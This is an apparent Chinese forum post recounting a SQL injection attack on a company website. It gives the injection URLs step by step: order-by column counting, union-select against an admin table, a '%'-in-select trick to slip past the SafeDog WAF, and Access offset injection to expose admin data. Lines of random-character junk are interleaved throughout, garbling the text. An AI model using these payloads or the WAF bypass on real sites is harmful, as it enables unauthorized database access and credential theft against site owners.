打开网站,一个企业站。) B/ }8 N. a: l' V# z
, v2 |# Y9 \0 I/ Z# Q$ M3 l8 D) n& y) t/ p( _* |
顺手加个admin
; C: Q* k- H( e' g( C& A8 ^. f" m0 o X* P% H
. R( I0 f" ?6 w$ t' y: I( J2 W默认后台。
7 l; P7 n, g) Y+ a) t# g0 U! ]回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。- ~5 L0 U% @& m& W W$ B
$ d. Q7 L7 A8 {+ c
7 K$ ?+ K5 H7 G& t
. e5 p1 b! b7 p! `( |/ a所以就不用御剑扫了,待会直接封IP。. u! Q& c+ V% m, H
1 j9 {$ a. ]9 }0 G; n* o
用order by语句判断是否存在注入。" _( k% M, V/ s6 r/ T
http://www.xxx.com /product_show.asp?id=997 order by 1
% o2 k/ W1 | P/ O5 Ahttp://www.xxx.com /product_show.asp?id=997 order by 100
" S4 |6 w k$ y9 A4 f现在存在注入,经测试后发现是9个字段。
1 Q: ~% I0 k5 a! e
7 t1 `5 B. `- F2 [接下来进行联合查询,猜是否存在admin表。0 |$ Y! A# P% E9 Y
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
) B# q# b0 j8 g6 P a9 Y; c+ @7 o8 T# h7 x5 P
- E, |) @- P% p8 r4 J
% P, Q' k1 ~# _ x% [6 Z在select中间加个%,se%lect绕过安全狗。. e/ \. Y k* o- s5 s5 Z5 X
5 M* b! Q! @0 C4 ?
' N, k4 Y1 e5 m3 {2 p- ]6 g7 x发现存在admin表,然后开始手工猜常用的字段。8 p- x+ E: I( s1 N5 u& \2 w
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
5 r# z* R( j: K- F; h A8 G 7 U) u. \, y- r% z- A- K
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
/ I& M( V; A0 u; b% o# T, d9 }
k( S6 P/ W" \' ~( |: T2 ]3 I8 w科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
6 I3 d9 m" G8 phttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
$ c% L \4 I7 ?5 A$ I好了,敏感内容出显了。
. f I! @5 V9 F5 b5 ~# ^: ]5 x- h# k
. A7 R, D$ a, c* \1 j% G
J* m" B6 `& @# t% } |